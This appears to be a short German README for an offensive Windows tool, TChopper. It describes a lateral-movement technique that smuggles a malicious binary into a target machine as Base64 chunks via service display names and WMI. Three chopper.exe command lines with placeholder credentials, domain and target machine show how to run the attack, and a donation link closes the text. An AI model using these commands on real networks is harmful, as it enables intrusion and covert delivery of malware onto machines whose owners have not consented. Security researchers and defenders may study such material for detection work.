
Führen Sie einen Lateral-Movement-Angriff durch, indem Sie den Anzeigenamen ungefilterter Dienste nutzen, um Binärdateien als Blöcke in die Zielmaschine einzuschleusen.
Neue Technik, die ich kürzlich entdeckt habe und ihr den Spitznamen (Chop chop) gegeben habe, um laterale Bewegung unter Verwendung von Windows-Dienst-Anzeigenamen und WMI durchzuführen, indem das schädliche Binary als Base64-Chunks geschmuggelt wird, und den Prozess mit dem TChopper-Tool automatisieren.
image
Während Sie laterale Bewegung mit der WMI-Technik durchführen, können Sie auch Chopper dafür verwenden.
image
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
Ich erstelle Offsec-Tools für die Open-Source-Community, zeigen Sie Ihre Unterstützung https://paypal.me/0xsp